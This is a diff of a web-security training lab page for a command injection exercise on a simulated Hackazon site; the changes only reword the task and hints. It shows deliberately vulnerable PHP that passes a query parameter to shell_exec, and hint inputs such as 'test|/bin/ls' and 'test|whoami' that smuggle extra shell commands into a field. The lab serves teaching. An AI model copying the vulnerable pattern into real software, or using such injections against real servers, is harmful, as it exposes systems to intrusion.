Web Software Security Learn

 ★ 100 points — inject commands to discover the server filesystem

-Task: The simulated Hackazon page below passes your page input directly to a shell.
+Task: The simulated Hackazon page passes your page input directly to a shell.
 Inject Linux commands to explore the filesystem, then answer the lab questions.

-The vulnerable server code: shell_exec("cat documents/" . $_GET['page'])
+Vulnerable code: shell_exec("cat documents/" . $_GET['page'])

 🔍 Hints

-• To list current directory: enter test|/bin/ls in the page field
+• List current directory: test|/bin/ls

-• For human-readable listing: test|/bin/ls -lh
+• Human-readable listing: test|/bin/ls -lh

-• To list root directory: test|/bin/ls /
+• List root directory: test|/bin/ls /

-• To show current working path: test|/bin/pwd
+• Show working path: test|/bin/pwd

-• To show server user: test|whoami
+• Show server user: test|whoami

 CI-3